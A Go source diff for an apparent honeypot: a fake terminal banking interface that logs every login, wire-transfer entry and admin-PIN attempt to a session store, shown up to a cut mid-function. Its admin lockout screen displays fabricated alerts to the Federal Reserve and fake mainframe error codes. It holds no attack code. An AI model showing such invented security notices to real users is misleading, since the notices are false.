return m, tea.Batch(tea.ClearScreen, logAction(m.sess, "MENU 5", "SECURE MESSAGES"))
case "6":
m.screen = screenChangePin
m.changePin = newChangePinModel()
return m, tea.Batch(tea.ClearScreen, logAction(m.sess, "MENU 6", "CHANGE PIN"))
case "7":
m.quitting = true
return m, tea.Batch(logAction(m.sess, "LOGOUT", "SESSION ENDED"), tea.Quit)
case "99", "admin", "ADMIN":
m.screen = screenAdmin
m.admin = newAdminModel()
return m, tea.Batch(tea.ClearScreen, logAction(m.sess, "ADMIN ACCESS ATTEMPT", "ADMIN SCREEN SHOWN"))
}
// Invalid choice, reset.
m.menu.choice = ""
}
return m, cmd
}
func (m *model) updateAccountSummary(msg tea.Msg) (tea.Model, tea.Cmd) {
if _, ok := msg.(tea.KeyMsg); ok {
return m, m.goToMenu()
}
return m, nil
}
func (m *model) updateAccountDetail(msg tea.Msg) (tea.Model, tea.Cmd) {
var cmd tea.Cmd
m.detail, cmd = m.detail.Update(msg)
if m.detail.choice == "back" {
return m, tea.Batch(cmd, m.goToMenu())
}
return m, cmd
}
func (m *model) updateTransfer(msg tea.Msg) (tea.Model, tea.Cmd) {
prevStep := m.transfer.step
var cmd tea.Cmd
m.transfer, cmd = m.transfer.Update(msg)
// Transfer cancelled.
if m.transfer.confirm == "cancelled" {
clearCmd := m.goToMenu()
return m, tea.Batch(clearCmd, logAction(m.sess, "WIRE TRANSFER CANCELLED", "USER CANCELLED"))
}
// Clear screen when transfer steps change content height significantly
// (e.g. confirm→authcode, fields→confirm, authcode→complete).
if m.transfer.step != prevStep {
cmd = tea.Batch(cmd, tea.ClearScreen)
}
// Transfer completed — log it.
if m.transfer.step == transferStepComplete && prevStep != transferStepComplete {
t := m.transfer.transfer
m.state.Transfers = append(m.state.Transfers, t)
logMsg := fmt.Sprintf("WIRE TRANSFER: routing=%s dest=%s beneficiary=%s bank=%s amount=%s memo=%s auth=%s",
t.RoutingNumber, t.DestAccount, t.Beneficiary, t.BankName, t.Amount, t.Memo, t.AuthCode)
return m, tea.Batch(cmd, logAction(m.sess, logMsg, "TRANSFER QUEUED"))
}
// Completed screen → any key goes back.
if m.transfer.step == transferStepComplete {
if _, ok := msg.(tea.KeyMsg); ok && prevStep == transferStepComplete {
return m, tea.Batch(cmd, m.goToMenu())
}
}
return m, cmd
}
func (m *model) updateHistory(msg tea.Msg) (tea.Model, tea.Cmd) {
var cmd tea.Cmd
m.history, cmd = m.history.Update(msg)
if m.history.choice == "back" {
return m, tea.Batch(cmd, m.goToMenu())
}
return m, cmd
}
func (m *model) updateMessages(msg tea.Msg) (tea.Model, tea.Cmd) {
var cmd tea.Cmd
m.messages, cmd = m.messages.Update(msg)
if m.messages.choice == "back" {
return m, tea.Batch(cmd, m.goToMenu())
}
// Log when viewing a message.
if m.messages.viewing >= 0 {
idx := m.messages.viewing
return m, tea.Batch(cmd, logAction(m.sess,
fmt.Sprintf("VIEW MESSAGE #%d", idx+1),
m.state.Messages[idx].Subj))
}
return m, cmd
}
func (m *model) updateChangePin(msg tea.Msg) (tea.Model, tea.Cmd) {
prevStage := m.changePin.stage
var cmd tea.Cmd
m.changePin, cmd = m.changePin.Update(msg)
// Log successful PIN change.
if m.changePin.stage == 3 && prevStage != 3 {
cmd = tea.Batch(cmd, logAction(m.sess, "CHANGE PIN", "PIN CHANGED SUCCESSFULLY"))
}
if m.changePin.done {
return m, tea.Batch(cmd, m.goToMenu())
}
return m, cmd
}
func (m *model) updateAdmin(msg tea.Msg) (tea.Model, tea.Cmd) {
prevLocked := m.admin.locked
prevAttempts := m.admin.attempts
// Check for ESC before delegating.
if keyMsg, ok := msg.(tea.KeyMsg); ok && keyMsg.Type == tea.KeyEscape && !m.admin.locked {
return m, m.goToMenu()
}
var cmd tea.Cmd
m.admin, cmd = m.admin.Update(msg)
// Log failed attempts.
if m.admin.attempts > prevAttempts {
cmd = tea.Batch(cmd, logAction(m.sess,
fmt.Sprintf("ADMIN PIN ATTEMPT #%d", m.admin.attempts),
"INVALID CREDENTIALS"))
}
// Log lockout.
if m.admin.locked && !prevLocked {
cmd = tea.Batch(cmd, tea.ClearScreen, logAction(m.sess,
"ADMIN LOCKOUT",
"TERMINAL LOCKED - INCIDENT LOGGED"))
}
// If locked and any key pressed, go back.
if m.admin.locked {
if _, ok := msg.(tea.KeyMsg); ok && prevLocked {
return m, tea.Batch(cmd, m.goToMenu())
}
}
return m, cmd
}
func (m *model) goToMenu() tea.Cmd {
unread := 0
for _, msg := range m.state.Messages {
if msg.Unread {
unread++
}
}
m.screen = screenMenu
m.menu = newMenuModel(m.bankName, unread)
return tea.ClearScreen
}
// logAction returns a tea.Cmd that logs an action to the session store.
func logAction(sess *shell.SessionContext, input, output string) tea.Cmd {
return func() tea.Msg {
if sess.Store != nil {
ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
defer cancel()
_ = sess.Store.AppendSessionLog(ctx, sess.SessionID, input, output)
}
if sess.OnCommand != nil {
sess.OnCommand("banking")
}
return nil
}
}

View File

@@ -0,0 +1,213 @@
package banking
import (
"fmt"
"strings"
tea "github.com/charmbracelet/bubbletea"
)
// --- Account Summary ---
type accountSummaryModel struct {
accounts []Account
}
func newAccountSummaryModel(accounts []Account) accountSummaryModel {
return accountSummaryModel{accounts: accounts}
}
func (m accountSummaryModel) Update(_ tea.Msg) (accountSummaryModel, tea.Cmd) {
// Any key returns to menu.
return m, nil
}
func (m accountSummaryModel) View() string {
var b strings.Builder
b.WriteString("\n")
b.WriteString(centerText("ACCOUNT SUMMARY"))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
// Header.
b.WriteString(titleStyle.Render(fmt.Sprintf(" %-12s %-18s %18s", "ACCOUNT", "TYPE", "BALANCE")))
b.WriteString("\n")
b.WriteString(dimStyle.Render(" " + strings.Repeat("-", 50)))
b.WriteString("\n")
total := int64(0)
for _, acct := range m.accounts {
total += acct.Balance
b.WriteString(baseStyle.Render(fmt.Sprintf(" %-12s %-18s %18s",
acct.Number, acct.Type, formatCurrency(acct.Balance))))
b.WriteString("\n")
}
b.WriteString(dimStyle.Render(" " + strings.Repeat("-", 50)))
b.WriteString("\n")
b.WriteString(titleStyle.Render(fmt.Sprintf(" %-12s %-18s %18s", "", "TOTAL", formatCurrency(total))))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
b.WriteString(dimStyle.Render(" PRESS ANY KEY TO RETURN TO MAIN MENU"))
b.WriteString("\n")
return b.String()
}
// --- Account Detail (with transactions) ---
type accountDetailModel struct {
accounts []Account
transactions map[string][]Transaction
selected int
page int
pageSize int
choosing bool
choice string
}
func newAccountDetailModel(accounts []Account, transactions map[string][]Transaction) accountDetailModel {
return accountDetailModel{
accounts: accounts,
transactions: transactions,
choosing: true,
pageSize: 10,
}
}
func (m accountDetailModel) Update(msg tea.Msg) (accountDetailModel, tea.Cmd) {
keyMsg, ok := msg.(tea.KeyMsg)
if !ok {
return m, nil
}
if m.choosing {
switch keyMsg.Type {
case tea.KeyEnter:
for i := range m.accounts {
if m.choice == fmt.Sprintf("%d", i+1) {
m.selected = i
m.choosing = false
m.page = 0
break
}
}
if m.choice == "0" {
m.choice = "back"
}
return m, nil
case tea.KeyBackspace:
if len(m.choice) > 0 {
m.choice = m.choice[:len(m.choice)-1]
}
default:
ch := keyMsg.String()
if len(ch) == 1 && ch[0] >= '0' && ch[0] <= '9' {
m.choice += ch
}
}
} else {
switch keyMsg.String() {
case "n", "N":
acctNum := m.accounts[m.selected].Number
txns := m.transactions[acctNum]
maxPage := (len(txns) - 1) / m.pageSize
if m.page < maxPage {
m.page++
}
case "p", "P":
if m.page > 0 {
m.page--
}
case "b", "B":
m.choosing = true
m.choice = ""
default:
m.choice = "back"
}
}
return m, nil
}
func (m accountDetailModel) View() string {
if m.choosing {
return m.viewChooseAccount()
}
return m.viewDetail()
}
func (m accountDetailModel) viewChooseAccount() string {
var b strings.Builder
b.WriteString("\n")
b.WriteString(centerText("ACCOUNT DETAIL"))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
b.WriteString(titleStyle.Render(" SELECT ACCOUNT:"))
b.WriteString("\n\n")
for i, acct := range m.accounts {
b.WriteString(baseStyle.Render(fmt.Sprintf(" [%d] %s - %s %s",
i+1, acct.Number, acct.Type, formatCurrency(acct.Balance))))
b.WriteString("\n")
}
b.WriteString("\n")
b.WriteString(baseStyle.Render(" [0] RETURN TO MAIN MENU"))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
b.WriteString(titleStyle.Render(" ENTER SELECTION: "))
b.WriteString(inputStyle.Render(m.choice))
b.WriteString(inputStyle.Render("_"))
b.WriteString("\n")
return b.String()
}
func (m accountDetailModel) viewDetail() string {
var b strings.Builder
acct := m.accounts[m.selected]
txns := m.transactions[acct.Number]
b.WriteString("\n")
b.WriteString(centerText(fmt.Sprintf("ACCOUNT DETAIL - %s", acct.Number)))
b.WriteString("\n\n")
b.WriteString(baseStyle.Render(fmt.Sprintf(" TYPE: %s", acct.Type)))
b.WriteString("\n")
b.WriteString(baseStyle.Render(fmt.Sprintf(" BALANCE: %s", formatCurrency(acct.Balance))))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
// Header.
b.WriteString(titleStyle.Render(fmt.Sprintf(" %-12s %-34s %12s %12s", "DATE", "DESCRIPTION", "AMOUNT", "BALANCE")))
b.WriteString("\n")
b.WriteString(dimStyle.Render(" " + strings.Repeat("-", 72)))
b.WriteString("\n")
// Paginate.
start := m.page * m.pageSize
end := min(start+m.pageSize, len(txns))
for _, txn := range txns[start:end] {
b.WriteString(baseStyle.Render(fmt.Sprintf(" %-12s %-34s %12s %12s",
txn.Date, txn.Description, formatCurrency(txn.Amount), formatCurrency(txn.Balance))))
b.WriteString("\n")
}
b.WriteString("\n")
totalPages := (len(txns) + m.pageSize - 1) / m.pageSize
b.WriteString(dimStyle.Render(fmt.Sprintf(" PAGE %d OF %d", m.page+1, totalPages)))
b.WriteString("\n\n")
b.WriteString(dimStyle.Render(" [N]EXT PAGE [P]REV PAGE [B]ACK ANY OTHER KEY = MAIN MENU"))
b.WriteString("\n")
return b.String()
}

View File

@@ -0,0 +1,111 @@
package banking
import (
"fmt"
"strings"
tea "github.com/charmbracelet/bubbletea"
)
type adminModel struct {
pin string
attempts int
locked bool
}
func newAdminModel() adminModel {
return adminModel{}
}
func (m adminModel) Update(msg tea.Msg) (adminModel, tea.Cmd) {
if m.locked {
return m, nil
}
keyMsg, ok := msg.(tea.KeyMsg)
if !ok {
return m, nil
}
switch keyMsg.Type {
case tea.KeyEnter:
if m.pin != "" {
m.attempts++
if m.attempts >= 3 {
m.locked = true
}
m.pin = ""
}
case tea.KeyBackspace:
if len(m.pin) > 0 {
m.pin = m.pin[:len(m.pin)-1]
}
default:
ch := keyMsg.String()
if len(ch) == 1 && ch[0] >= 32 && ch[0] < 127 && len(m.pin) < 20 {
m.pin += ch
}
}
return m, nil
}
func (m adminModel) View() string {
var b strings.Builder
b.WriteString("\n")
b.WriteString(centerText("SYSTEM ADMINISTRATION"))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
if m.locked {
b.WriteString(errorStyle.Render(" *** ACCESS DENIED ***"))
b.WriteString("\n\n")
b.WriteString(errorStyle.Render(" MAXIMUM AUTHENTICATION ATTEMPTS EXCEEDED"))
b.WriteString("\n")
b.WriteString(errorStyle.Render(" TERMINAL LOCKED - INCIDENT LOGGED"))
b.WriteString("\n\n")
b.WriteString(baseStyle.Render(" SECURITY ALERT HAS BEEN DISPATCHED TO:"))
b.WriteString("\n")
b.WriteString(baseStyle.Render(" - INFORMATION SECURITY DEPT"))
b.WriteString("\n")
b.WriteString(baseStyle.Render(" - BRANCH SECURITY OFFICER"))
b.WriteString("\n")
b.WriteString(baseStyle.Render(" - FEDERAL RESERVE OVERSIGHT"))
b.WriteString("\n\n")
b.WriteString(baseStyle.Render(fmt.Sprintf(" INCIDENT REF: SEC-%d-ADMIN-BRUTE", 20240000+m.attempts)))
b.WriteString("\n\n")
b.WriteString(dimStyle.Render(" IEF4271I UNAUTHORIZED ACCESS ATTEMPT - ABEND S0C4"))
b.WriteString("\n")
b.WriteString(dimStyle.Render(" IEF4272I JOB SECADMIN STEP0001 - COND CODE 4088"))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
b.WriteString(dimStyle.Render(" PRESS ANY KEY TO RETURN TO MAIN MENU"))
b.WriteString("\n")
} else {
b.WriteString(titleStyle.Render(" RESTRICTED ACCESS - ADMINISTRATOR ONLY"))
b.WriteString("\n\n")
b.WriteString(baseStyle.Render(" THIS FUNCTION REQUIRES LEVEL 5 SECURITY CLEARANCE."))
b.WriteString("\n")
b.WriteString(baseStyle.Render(" ALL ACCESS ATTEMPTS ARE LOGGED AND AUDITED."))
b.WriteString("\n\n")
if m.attempts > 0 {
b.WriteString(errorStyle.Render(fmt.Sprintf(" INVALID CREDENTIALS (%d OF 3 ATTEMPTS)", m.attempts)))
b.WriteString("\n\n")
}
b.WriteString(titleStyle.Render(" ADMIN PIN: "))
masked := strings.Repeat("*", len(m.pin))
b.WriteString(inputStyle.Render(masked))
b.WriteString(inputStyle.Render("_"))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
b.WriteString(dimStyle.Render(" PRESS ESC TO RETURN TO MAIN MENU"))
b.WriteString("\n")
}
return b.String()
}

View File

@@ -0,0 +1,111 @@
package banking
import (
"strings"
tea "github.com/charmbracelet/bubbletea"
)
type changePinModel struct {
input string
stage int // 0=old, 1=new, 2=confirm, 3=done
newPin string
done bool
}
func newChangePinModel() changePinModel {
return changePinModel{}
}
func (m changePinModel) Update(msg tea.Msg) (changePinModel, tea.Cmd) {
keyMsg, ok := msg.(tea.KeyMsg)
if !ok {
return m, nil
}
if m.stage == 3 {
m.done = true
return m, nil
}
switch keyMsg.Type {
case tea.KeyEnter:
switch m.stage {
case 0:
if m.input != "" {
m.stage = 1
m.input = ""
}
case 1:
if len(m.input) >= 4 {
m.newPin = m.input
m.stage = 2
m.input = ""
}
case 2:
if m.input == m.newPin {
m.stage = 3
} else {
m.input = ""
m.newPin = ""
m.stage = 1
}
}
case tea.KeyEscape:
m.done = true
case tea.KeyBackspace:
if len(m.input) > 0 {
m.input = m.input[:len(m.input)-1]
}
default:
ch := keyMsg.String()
if len(ch) == 1 && ch[0] >= 32 && ch[0] < 127 && len(m.input) < 12 {
m.input += ch
}
}
return m, nil
}
func (m changePinModel) View() string {
var b strings.Builder
b.WriteString("\n")
b.WriteString(centerText("CHANGE PIN"))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
if m.stage == 3 {
b.WriteString(titleStyle.Render(" PIN CHANGED SUCCESSFULLY"))
b.WriteString("\n\n")
b.WriteString(baseStyle.Render(" YOUR NEW PIN IS NOW ACTIVE."))
b.WriteString("\n")
b.WriteString(baseStyle.Render(" PLEASE USE YOUR NEW PIN FOR ALL FUTURE TRANSACTIONS."))
b.WriteString("\n\n")
b.WriteString(dimStyle.Render(" PRESS ANY KEY TO RETURN TO MAIN MENU"))
} else {
prompts := []string{" CURRENT PIN: ", " NEW PIN: ", " CONFIRM PIN: "}
for i := 0; i < m.stage; i++ {
b.WriteString(baseStyle.Render(prompts[i]))
b.WriteString(baseStyle.Render(strings.Repeat("*", 4)))
b.WriteString("\n")
}
if m.stage < 3 {
b.WriteString(titleStyle.Render(prompts[m.stage]))
masked := strings.Repeat("*", len(m.input))
b.WriteString(inputStyle.Render(masked))
b.WriteString(inputStyle.Render("_"))
b.WriteString("\n")
}
b.WriteString("\n")
if m.stage == 1 {
b.WriteString(dimStyle.Render(" PIN MUST BE AT LEAST 4 CHARACTERS"))
b.WriteString("\n")
}
b.WriteString("\n")
b.WriteString(dimStyle.Render(" PRESS ESC TO RETURN TO MAIN MENU"))
}
b.WriteString("\n")
return b.String()
}

View File

@@ -0,0 +1,152 @@
package banking
import (
"fmt"
"strings"
tea "github.com/charmbracelet/bubbletea"
)
type historyModel struct {
accounts []Account
transactions map[string][]Transaction
selected int
page int
pageSize int
choosing bool
choice string
}
func newHistoryModel(accounts []Account, transactions map[string][]Transaction) historyModel {
return historyModel{
accounts: accounts,
transactions: transactions,
choosing: true,
pageSize: 12,
}
}
func (m historyModel) Update(msg tea.Msg) (historyModel, tea.Cmd) {
keyMsg, ok := msg.(tea.KeyMsg)
if !ok {
return m, nil
}
if m.choosing {
switch keyMsg.Type {
case tea.KeyEnter:
for i := range m.accounts {
if m.choice == fmt.Sprintf("%d", i+1) {
m.selected = i
m.choosing = false
m.page = 0
break
}
}
if m.choice == "0" {
m.choice = "back"
}
return m, nil
case tea.KeyBackspace:
if len(m.choice) > 0 {
m.choice = m.choice[:len(m.choice)-1]
}
default:
ch := keyMsg.String()
if len(ch) == 1 && ch[0] >= '0' && ch[0] <= '9' {
m.choice += ch
}
}
} else {
switch keyMsg.String() {
case "n", "N":
acctNum := m.accounts[m.selected].Number
txns := m.transactions[acctNum]
maxPage := (len(txns) - 1) / m.pageSize
if m.page < maxPage {
m.page++
}
case "p", "P":
if m.page > 0 {
m.page--
}
case "b", "B":
m.choosing = true
m.choice = ""
default:
m.choice = "back"
}
}
return m, nil
}
func (m historyModel) View() string {
if m.choosing {
return m.viewChooseAccount()
}
return m.viewHistory()
}
func (m historyModel) viewChooseAccount() string {
var b strings.Builder
b.WriteString("\n")
b.WriteString(centerText("TRANSACTION HISTORY"))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
b.WriteString(titleStyle.Render(" SELECT ACCOUNT:"))
b.WriteString("\n\n")
for i, acct := range m.accounts {
b.WriteString(baseStyle.Render(fmt.Sprintf(" [%d] %s - %s",
i+1, acct.Number, acct.Type)))
b.WriteString("\n")
}
b.WriteString("\n")
b.WriteString(baseStyle.Render(" [0] RETURN TO MAIN MENU"))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
b.WriteString(titleStyle.Render(" ENTER SELECTION: "))
b.WriteString(inputStyle.Render(m.choice))
b.WriteString(inputStyle.Render("_"))
b.WriteString("\n")
return b.String()
}
func (m historyModel) viewHistory() string {
var b strings.Builder
acct := m.accounts[m.selected]
txns := m.transactions[acct.Number]
b.WriteString("\n")
b.WriteString(centerText(fmt.Sprintf("TRANSACTION HISTORY - %s (%s)", acct.Number, acct.Type)))
b.WriteString("\n\n")
b.WriteString(titleStyle.Render(fmt.Sprintf(" %-12s %-40s %14s", "DATE", "DESCRIPTION", "AMOUNT")))
b.WriteString("\n")
b.WriteString(dimStyle.Render(" " + strings.Repeat("-", 68)))
b.WriteString("\n")
start := m.page * m.pageSize
end := min(start+m.pageSize, len(txns))
for _, txn := range txns[start:end] {
b.WriteString(baseStyle.Render(fmt.Sprintf(" %-12s %-40s %14s",
txn.Date, txn.Description, formatCurrency(txn.Amount))))
b.WriteString("\n")
}
b.WriteString("\n")
totalPages := (len(txns) + m.pageSize - 1) / m.pageSize
b.WriteString(dimStyle.Render(fmt.Sprintf(" PAGE %d OF %d", m.page+1, totalPages)))
b.WriteString("\n\n")
b.WriteString(dimStyle.Render(" [N]EXT PAGE [P]REV PAGE [B]ACK ANY OTHER KEY = MAIN MENU"))
b.WriteString("\n")
return b.String()
}

View File

@@ -0,0 +1,103 @@
package banking
import (
"fmt"
"strings"
tea "github.com/charmbracelet/bubbletea"
)
type loginModel struct {
accountNum string
pin string
stage int // 0 = account, 1 = pin, 2 = authenticating
bankName string
}
func newLoginModel(bankName string) loginModel {
return loginModel{bankName: bankName}
}
func (m loginModel) Update(msg tea.Msg) (loginModel, tea.Cmd) {
keyMsg, ok := msg.(tea.KeyMsg)
if !ok {
return m, nil
}
switch keyMsg.Type {
case tea.KeyEnter:
if m.stage == 0 && m.accountNum != "" {
m.stage = 1
return m, nil
}
if m.stage == 1 && m.pin != "" {
m.stage = 2
return m, nil
}
case tea.KeyBackspace:
if m.stage == 0 && len(m.accountNum) > 0 {
m.accountNum = m.accountNum[:len(m.accountNum)-1]
} else if m.stage == 1 && len(m.pin) > 0 {
m.pin = m.pin[:len(m.pin)-1]
}
default:
ch := keyMsg.String()
if len(ch) == 1 && ch[0] >= 32 && ch[0] < 127 {
if m.stage == 0 && len(m.accountNum) < 20 {
m.accountNum += ch
} else if m.stage == 1 && len(m.pin) < 12 {
m.pin += ch
}
}
}
return m, nil
}
func (m loginModel) View() string {
var b strings.Builder
b.WriteString("\n")
b.WriteString(centerText(m.bankName + " ONLINE BANKING"))
b.WriteString("\n")
b.WriteString(centerText("AUTHORIZED ACCESS ONLY"))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
b.WriteString(titleStyle.Render(" ACCOUNT NUMBER: "))
if m.stage == 0 {
b.WriteString(inputStyle.Render(m.accountNum))
b.WriteString(inputStyle.Render("_"))
} else {
b.WriteString(baseStyle.Render(m.accountNum))
}
b.WriteString("\n\n")
if m.stage >= 1 {
b.WriteString(titleStyle.Render(" PIN: "))
masked := strings.Repeat("*", len(m.pin))
if m.stage == 1 {
b.WriteString(inputStyle.Render(masked))
b.WriteString(inputStyle.Render("_"))
} else {
b.WriteString(baseStyle.Render(masked))
}
b.WriteString("\n")
}
if m.stage == 2 {
b.WriteString("\n")
b.WriteString(baseStyle.Render(" AUTHENTICATING..."))
b.WriteString("\n")
}
b.WriteString("\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
b.WriteString(dimStyle.Render(" WARNING: UNAUTHORIZED ACCESS TO THIS SYSTEM IS A FEDERAL CRIME"))
b.WriteString("\n")
b.WriteString(dimStyle.Render(fmt.Sprintf(" UNDER 18 U.S.C. %s 1030. ALL ACTIVITY IS MONITORED AND LOGGED.", "\u00A7")))
b.WriteString("\n")
return b.String()
}

View File

@@ -0,0 +1,80 @@
package banking
import (
"fmt"
"strings"
tea "github.com/charmbracelet/bubbletea"
)
type menuModel struct {
choice string
unread int
bankName string
}
func newMenuModel(bankName string, unreadCount int) menuModel {
return menuModel{bankName: bankName, unread: unreadCount}
}
func (m menuModel) Update(msg tea.Msg) (menuModel, tea.Cmd) {
keyMsg, ok := msg.(tea.KeyMsg)
if !ok {
return m, nil
}
switch keyMsg.Type {
case tea.KeyEnter:
return m, nil
case tea.KeyBackspace:
if len(m.choice) > 0 {
m.choice = m.choice[:len(m.choice)-1]
}
default:
ch := keyMsg.String()
if len(ch) == 1 && ch[0] >= 32 && ch[0] < 127 {
if len(m.choice) < 10 {
m.choice += ch
}
}
}
return m, nil
}
func (m menuModel) View() string {
var b strings.Builder
b.WriteString("\n")
b.WriteString(centerText("MAIN MENU"))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
items := []struct {
num string
desc string
}{
{"1", "ACCOUNT SUMMARY"},
{"2", "ACCOUNT DETAIL / TRANSACTIONS"},
{"3", "WIRE TRANSFER"},
{"4", "TRANSACTION HISTORY"},
{"5", fmt.Sprintf("SECURE MESSAGES (%d UNREAD)", m.unread)},
{"6", "CHANGE PIN"},
{"7", "LOGOUT"},
}
for _, item := range items {
b.WriteString(baseStyle.Render(fmt.Sprintf(" [%s] %s", item.num, item.desc)))
b.WriteString("\n")
}
b.WriteString("\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
b.WriteString(titleStyle.Render(" ENTER SELECTION: "))
b.WriteString(inputStyle.Render(m.choice))
b.WriteString(inputStyle.Render("_"))
b.WriteString("\n")
return b.String()
}

View File

@@ -0,0 +1,122 @@
package banking
import (
"fmt"
"strings"
tea "github.com/charmbracelet/bubbletea"
)
type messagesModel struct {
messages []SecureMessage
viewing int // -1 = list, >= 0 = detail
choice string
}
func newMessagesModel(messages []SecureMessage) messagesModel {
return messagesModel{messages: messages, viewing: -1}
}
func (m messagesModel) Update(msg tea.Msg) (messagesModel, tea.Cmd) {
keyMsg, ok := msg.(tea.KeyMsg)
if !ok {
return m, nil
}
if m.viewing >= 0 {
// In detail view, any key goes back to list.
m.viewing = -1
m.choice = ""
return m, nil
}
switch keyMsg.Type {
case tea.KeyEnter:
if m.choice == "0" {
m.choice = "back"
return m, nil
}
for i := range m.messages {
if m.choice == fmt.Sprintf("%d", i+1) {
m.viewing = i
m.messages[i].Unread = false
return m, nil
}
}
m.choice = ""
case tea.KeyBackspace:
if len(m.choice) > 0 {
m.choice = m.choice[:len(m.choice)-1]
}
default:
ch := keyMsg.String()
if len(ch) == 1 && ch[0] >= '0' && ch[0] <= '9' && len(m.choice) < 2 {
m.choice += ch
}
}
return m, nil
}
func (m messagesModel) View() string {
if m.viewing >= 0 {
return m.viewDetail()
}
return m.viewList()
}
func (m messagesModel) viewList() string {
var b strings.Builder
b.WriteString("\n")
b.WriteString(centerText("SECURE MESSAGES"))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
b.WriteString(titleStyle.Render(fmt.Sprintf(" %-4s %-3s %-12s %-22s %s", "#", "", "DATE", "FROM", "SUBJECT")))
b.WriteString("\n")
b.WriteString(dimStyle.Render(" " + strings.Repeat("-", 68)))
b.WriteString("\n")
for i, msg := range m.messages {
marker := " "
if msg.Unread {
marker = " * "
}
b.WriteString(baseStyle.Render(fmt.Sprintf(" [%d]%s%-12s %-22s %s",
i+1, marker, msg.Date, msg.From, msg.Subj)))
b.WriteString("\n")
}
b.WriteString("\n")
b.WriteString(baseStyle.Render(" [0] RETURN TO MAIN MENU"))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
b.WriteString(titleStyle.Render(" SELECT MESSAGE: "))
b.WriteString(inputStyle.Render(m.choice))
b.WriteString(inputStyle.Render("_"))
b.WriteString("\n")
return b.String()
}
func (m messagesModel) viewDetail() string {
var b strings.Builder
msg := m.messages[m.viewing]
b.WriteString("\n")
b.WriteString(centerText(fmt.Sprintf("MESSAGE #%d", m.viewing+1)))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
b.WriteString(baseStyle.Render(msg.Body))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
b.WriteString(dimStyle.Render(" PRESS ANY KEY TO RETURN TO MESSAGE LIST"))
b.WriteString("\n")
return b.String()
}

View File

@@ -0,0 +1,198 @@
package banking
import (
"fmt"
"strings"
tea "github.com/charmbracelet/bubbletea"
)
const (
transferStepRouting = iota
transferStepDest
transferStepBeneficiary
transferStepBankName
transferStepAmount
transferStepMemo
transferStepConfirm
transferStepAuthCode
transferStepComplete
)
var transferPrompts = []string{
" ROUTING NUMBER (ABA): ",
" DESTINATION ACCOUNT: ",
" BENEFICIARY NAME: ",
" RECEIVING BANK NAME: ",
" AMOUNT (USD): ",
" MEMO / REFERENCE: ",
"",
" AUTHORIZATION CODE: ",
}
type transferModel struct {
step int
fields [8]string // indexed by step
transfer WireTransfer
confirm string // y/n input for confirm step
}
func newTransferModel() transferModel {
return transferModel{}
}
func (m transferModel) Update(msg tea.Msg) (transferModel, tea.Cmd) {
keyMsg, ok := msg.(tea.KeyMsg)
if !ok {
return m, nil
}
if m.step == transferStepComplete {
return m, nil
}
if m.step == transferStepConfirm {
switch keyMsg.Type {
case tea.KeyEnter:
switch strings.ToUpper(m.confirm) {
case "Y", "YES":
m.step = transferStepAuthCode
case "N", "NO":
m.confirm = "cancelled"
}
return m, nil
case tea.KeyBackspace:
if len(m.confirm) > 0 {
m.confirm = m.confirm[:len(m.confirm)-1]
}
default:
ch := keyMsg.String()
if len(ch) == 1 && ch[0] >= 32 && ch[0] < 127 && len(m.confirm) < 3 {
m.confirm += ch
}
}
return m, nil
}
switch keyMsg.Type {
case tea.KeyEnter:
val := strings.TrimSpace(m.fields[m.step])
if val == "" {
return m, nil
}
if m.step == transferStepAuthCode {
m.transfer.AuthCode = val
m.step = transferStepComplete
return m, nil
}
switch m.step {
case transferStepRouting:
m.transfer.RoutingNumber = val
case transferStepDest:
m.transfer.DestAccount = val
case transferStepBeneficiary:
m.transfer.Beneficiary = val
case transferStepBankName:
m.transfer.BankName = val
case transferStepAmount:
m.transfer.Amount = val
case transferStepMemo:
m.transfer.Memo = val
}
m.step++
return m, nil
case tea.KeyBackspace:
if len(m.fields[m.step]) > 0 {
m.fields[m.step] = m.fields[m.step][:len(m.fields[m.step])-1]
}
default:
ch := keyMsg.String()
if len(ch) == 1 && ch[0] >= 32 && ch[0] < 127 && len(m.fields[m.step]) < 40 {
m.fields[m.step] += ch
}
}
return m, nil
}
func (m transferModel) View() string {
var b strings.Builder
b.WriteString("\n")
b.WriteString(centerText("WIRE TRANSFER"))
b.WriteString("\n\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
// Show completed fields.
for i := 0; i < m.step && i < len(transferPrompts); i++ {
if i == transferStepConfirm {
continue
}
prompt := transferPrompts[i]
if prompt == "" {
continue
}
b.WriteString(baseStyle.Render(prompt))
b.WriteString(baseStyle.Render(m.fields[i]))
b.WriteString("\n")
}
// Current field.
switch {
case m.step == transferStepConfirm:
b.WriteString("\n")
b.WriteString(titleStyle.Render(" === TRANSFER SUMMARY ==="))
b.WriteString("\n\n")
b.WriteString(baseStyle.Render(fmt.Sprintf(" ROUTING: %s", m.transfer.RoutingNumber)))
b.WriteString("\n")
b.WriteString(baseStyle.Render(fmt.Sprintf(" ACCOUNT: %s", m.transfer.DestAccount)))
b.WriteString("\n")
b.WriteString(baseStyle.Render(fmt.Sprintf(" BENEFICIARY: %s", m.transfer.Beneficiary)))
b.WriteString("\n")
b.WriteString(baseStyle.Render(fmt.Sprintf(" BANK: %s", m.transfer.BankName)))
b.WriteString("\n")
